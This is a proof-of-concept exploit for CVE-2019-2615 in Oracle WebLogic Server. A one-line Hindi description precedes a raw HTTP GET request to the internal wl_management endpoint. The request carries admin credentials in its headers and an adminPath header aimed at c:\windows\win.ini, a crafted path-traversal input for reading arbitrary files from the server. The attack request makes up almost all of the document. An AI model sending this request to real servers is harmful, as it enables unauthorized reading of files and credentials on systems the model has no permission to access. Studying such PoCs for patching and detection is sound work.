
CVE-2019-2615 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Oracle WebLogic Server को लक्षित करता है। तैयार किए गए HTTP अनुरोधों के माध्यम से अनधिकृत पाथ ट्रैवर्सल प्रदर्शित करता है ताकि मनमानी फ़ाइलें पढ़ी जा सकें।
GET /bea_wls_management_internal2/wl_management HTTP/1.1
Host: 192.168.5.137:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
username:weblogic
password:admin123456
wl_request_type:wl_jsp_refresh_request
adminPath:c:\windows\win.ini
Upgrade-Insecure-Requests: 1
